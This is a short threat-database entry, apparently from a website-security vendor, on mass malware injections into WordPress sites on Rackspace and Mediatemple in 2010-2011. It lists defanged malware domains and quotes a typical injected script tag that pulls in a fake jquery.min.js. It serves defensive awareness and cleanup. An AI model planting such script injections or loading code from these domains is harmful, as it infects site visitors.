Description:
Malware injections related to massive hacks of websites hosted on Rackspace and Mediatemple back in 2010-2011
Loads malware from
hxxp://m3h.toolbarinc[.]com hxxp://w7c5lrhqu .newsapis[.]us hxxp://brown.smartenergymodel[.]com/js/ jquery.min.js hxxp://azure.smartenergymodel[.]com /js/jquery.min.js hxxp://r91nu.emapis[.]org /js / jquery.min.js hxxp://d0j.emapis[.]org/js/ jquery.min.js hxxp://khaki.smartenergymodel[.]com/ js/ jquery.min.js hxxp://purple.gaindirectory[.]org/ js/ jquery.min.js And other domains.
Typical injected code
< script src = hxxp:// azure.smartenergymodel[.]com /js/jquery.min.js>
It infects .php, .html and .js files.
Related links:
http://blog.sucuri.net/2010/06/mass-attack-of-wordpress-blogs-on-rackspace.html
http://blog.unmaskparasites.com/2010/06/14/attack-on-wordpress-blogs-on-rackspace/
Affecting: WordPress websites. Mostly on Rackspace and Mediatemple.
Mitigation
How to clean a hacked WordPress site